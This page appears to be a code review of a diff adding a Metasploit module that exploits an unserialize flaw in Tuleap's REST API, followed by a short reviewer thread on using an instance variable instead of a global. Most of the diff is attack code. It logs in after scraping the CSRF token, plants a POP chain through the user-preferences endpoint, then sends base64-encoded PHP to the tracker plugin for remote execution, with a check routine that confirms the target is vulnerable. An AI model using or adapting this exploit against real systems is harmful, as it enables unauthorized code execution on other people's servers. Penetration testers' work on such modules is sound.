modules/exploits/unix/webapp/tuleap_rest_unserialize_exec.rb

```diff
@@ -0,0 +1,187 @@
+
+    pref = {'id' => uid, 'preference' => {'key' => 'recent_elements', 'value' => pop_chain}}
+
+    res = send_request_cgi({
+      'method'    => 'PATCH',
+      'uri'       => normalize_uri(target_uri.path, "api/users/#{uid}/preferences"),
+      'ctype'     => 'application/json',
+      'headers'   => {'X-Auth-Token' => token, 'X-Auth-UserId' => uid},
+      'data'      => pref.to_json
+    })
+
+    unless res and res.code == 200
+      msg = "Something went wrong"
+      if $is_check then print_error(msg) end
+      fail_with(Failure::UnexpectedReply, msg)
+    end
+  end
+
+  def do_login()
+    print_status("Retrieving the CSRF token for login...")
+
+    res = send_request_cgi({
+      'method'    => 'GET',
+      'uri'       => normalize_uri(target_uri.path, 'account/login.php')
+    })
+
+    if res and res.code == 200 and res.body and res.get_cookies
+      if res.body =~ /name="challenge" value="(\w+)">/
+        csrf_token = $1
+        print_good("CSRF token: #{csrf_token}")
+      else
+        print_warning("CSRF token not found. Trying to login without it...")
+      end
+    else
+      msg = "Failed to retrieve the login page"
+      if $is_check then print_error(msg) end
+      fail_with(Failure::NoAccess, msg)
+    end
+
+    user = datastore['USERNAME']
+    pass = datastore['PASSWORD']
+
+    res = send_request_cgi({
+      'method'    => 'POST',
+      'cookie'    => res.get_cookies,
+      'uri'       => normalize_uri(target_uri.path, 'account/login.php'),
+      'vars_post' => {'form_loginname' => user, 'form_pw' => pass, 'challenge' => csrf_token}
+    })
+
+    unless res and res.code == 302
+      msg = "Login failed with #{user}:#{pass}"
+      if $is_check then print_error(msg) end
+      fail_with(Failure::NoAccess, msg)
+    end
+
+    print_good("Login successful with #{user}:#{pass}")
+    res.get_cookies
+  end
+
+  def exec_php(php_code)
+    random_param = rand_text_alpha(10)
+
+    setup_popchain(random_param)
+    session_cookies = do_login()
+
+    print_status("Triggering the POP chain...")
+
+    res = send_request_cgi({
+      'method'    => 'POST',
+      'uri'       => normalize_uri(target_uri.path, "plugins/tracker/?aid=#{datastore['AID']}"),
+      'cookie'    => session_cookies,
+      'vars_post' => {random_param => Rex::Text.encode_base64(php_code)}
+    })
+
+    if res and res.code == 200 and res.body =~ /Exiting with Error/
+      msg = "No access to Artifact ID #{datastore['AID']}"
+      $is_check ? print_error(msg) : fail_with(Failure::NoAccess, msg)
+    end
+
+    res
+  end
+
+  def check
+    $is_check = true
+    flag = rand_text_alpha(rand(10)+20)
+    res  = exec_php("print '#{flag}';")
+
+    if res and res.code == 200 and res.body =~ /#{flag}/
+      return Exploit::CheckCode::Vulnerable
+    elsif res and res.body =~ /Exiting with Error/
+      return Exploit::CheckCode::Unknown
+    end
+
+    Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    $is_check = false
```

Comment:
You should be able to use an instance variable instead of a global. Globals can be dangerous.

```
@is_check = false
```

Reply:
What could possibly go wrong with that?

Reply:
It's not inherently dangerous, but you could be clobbering an existing global, or other code could be clobbering yours. In this case, an instance variable will suffice if you need to persist data across methods.

Reply:
Limiting scope of variables is a pretty well accepted coding practice.  Invert your question "what can someone intentionally do wrong with this value?"  In the case of some future implementation that possibly allows two user to instantiate a module in the same executing console (think `msfrpc`) the value of this global could be set by another thread in the same memory space.

https://www.securecoding.cert.org/confluence/display/c/DCL19-C.+Minimize+the+scope+of+variables+and+functions

Reply:
Gotcha! Thanks for the lesson!